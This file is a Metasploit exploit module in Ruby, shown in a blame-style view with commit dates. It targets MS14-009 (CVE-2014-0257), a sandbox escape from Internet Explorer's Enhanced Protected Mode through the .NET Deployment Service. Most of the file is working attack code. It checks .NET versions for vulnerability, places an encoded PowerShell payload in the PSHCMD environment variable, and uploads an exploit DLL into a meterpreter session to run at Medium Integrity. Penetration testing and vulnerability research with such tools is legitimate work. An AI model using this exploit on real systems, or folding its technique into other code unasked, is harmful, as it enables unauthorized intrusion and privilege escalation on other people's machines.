metasploit-framework/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

196 lines
5.6 KiB
Ruby
Raw Normal View History

2014-05-29 16:45:19 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
2014-06-02 01:58:08 +00:00
include Msf::Post::Windows::FileInfo
include Msf::Post::File
2014-05-29 16:45:19 +00:00
2014-06-02 01:58:08 +00:00
NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}
2014-05-29 16:45:19 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
2014-06-03 14:29:04 +00:00
'DefaultOptions' =>
{
'WfsDelay' => 30
},
2014-05-29 16:45:19 +00:00
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
end
2014-06-02 13:14:40 +00:00
def check
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
return Exploit::CheckCode::Unknown
end
net_version = get_net_version
if net_version.empty?
return Exploit::CheckCode::Unknown
end
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
return Exploit::CheckCode::Detected
end
mscorlib_version = get_mscorlib_version
if valid_mscorlib_version?(net_version, mscorlib_version)
return Exploit::CheckCode::Vulnerable
2014-06-02 13:14:40 +00:00
end
Exploit::CheckCode::Safe
2014-06-02 13:14:40 +00:00
end
def get_net_version
net_version = ""
dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")
NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end
net_version
end
def get_mscorlib_version
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version.join(".")
end
2014-05-29 16:45:19 +00:00
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
2014-06-02 01:58:08 +00:00
print_status("Searching .NET Deployment Service (dfsvc.exe)...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end
2014-06-02 13:14:40 +00:00
net_version = get_net_version
2014-06-02 01:58:08 +00:00
if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end
print_good(".NET Deployment Service from .NET #{net_version} found.")
print_status("Checking if .NET is patched...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end
2014-06-02 13:14:40 +00:00
mscorlib_version = get_mscorlib_version
2014-06-02 01:58:08 +00:00
2014-06-02 19:38:33 +00:00
unless valid_mscorlib_version?(net_version, mscorlib_version)
2014-06-02 01:58:08 +00:00
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end
print_good(".NET looks vulnerable, exploiting...")
2014-06-03 14:29:04 +00:00
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
2014-06-03 14:48:40 +00:00
print_status cmd
2014-06-03 14:29:04 +00:00
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
2014-05-30 17:20:00 +00:00
2014-06-03 14:29:04 +00:00
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
2014-05-29 16:45:19 +00:00
end
def valid_mscorlib_version?(net_version, mscorlib_version)
valid = false
mscorlib = mscorlib_version.split(".")
mscorlib.reverse!
max_version = NET_VERSIONS[net_version]["mscorlib"].split(".")
max_version.reverse!
i = 0
mscorlib.each do |v|
if v.to_i < max_version[i].to_i
valid = true
elsif v.to_i > max_version[i].to_i
valid = false
end
i = i + 1
end
valid
end
2014-05-29 16:45:19 +00:00
end